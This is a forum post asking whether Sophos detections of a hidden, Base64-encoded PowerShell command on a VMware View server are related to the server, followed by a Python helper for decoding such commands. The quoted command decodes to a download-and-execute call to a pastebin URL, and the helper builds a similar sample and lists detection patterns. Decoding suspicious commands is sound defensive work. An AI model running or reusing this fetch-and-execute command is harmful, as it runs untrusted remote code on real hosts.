notpoetry
Contributor

Sophos detecting Threats on view server powershell.exe - Exec_6a (T1059.001)

Hello,

We are getting over 100 detections on our view server.

Command line:

This is what is executed and it's blocked by Sophos.

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBnADkAMwB3AFcASABrAFIAJwApAA=="

Any idea if it's related to view server in any way or it's something else?

This is also the reason why we wanted to do what we noted here https://communities.vmware.com/t5/VMware-Horizon-Discussions/What-is-needed-for-RDP-access-only-we-w...

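A triage helper for alerts like the one in the post, added here as an example (not code from the poster, Sophos or VMware): it pulls the `-enc` argument out of a `powershell.exe` command line, decodes it (Base64 over UTF-16LE text) and lists indicators and URLs found in the recovered script. The indicator list, the function names and the `example.invalid` sample are assumptions made for illustration.

```python
import base64
import re

# Patterns flagged in a decoded script (illustrative starting list, an assumption).
INDICATORS = [
    ("iex", r"\biex\b"),
    ("invoke-expression", r"invoke-expression"),
    ("downloadstring", r"downloadstring"),
    ("net.webclient", r"net\.webclient"),
]

def is_encoded_flag(token):
    """True for -e, -ec, -enc ... -EncodedCommand (PowerShell accepts prefixes)."""
    name = token.lstrip("-/").lower()
    return token[0] in "-/" and bool(name) and (
        "encodedcommand".startswith(name) or name == "ec")

def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc, or None if absent or undecodable."""
    tokens = cmdline.strip().strip('"').split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            blob = tokens[i + 1].strip("'\"")
            try:
                # The argument is Base64 over UTF-16LE text.
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad Base64 or not UTF-16LE
                return None
    return None

def triage(cmdline):
    """Decode the command line and list matched indicators and URLs."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    hits = [name for name, pat in INDICATORS if re.search(pat, script, re.I)]
    urls = re.findall(r"https?://[^\s'\"`)]+", script)
    return {"script": script, "indicators": hits, "urls": urls}

def encode_sample(script):
    """Build a constructed -enc argument for the demo below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample in the same shape as the command line in the post.
SAMPLE = ("powershell.exe -NonInteractive -windowstyle hidden -enc " + encode_sample(
    "IEX (New-Object System.Net.WebClient).DownloadString('https://example.invalid/a')"))

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Passing the command line quoted in the post to `triage` shows what the blocked process was trying to run.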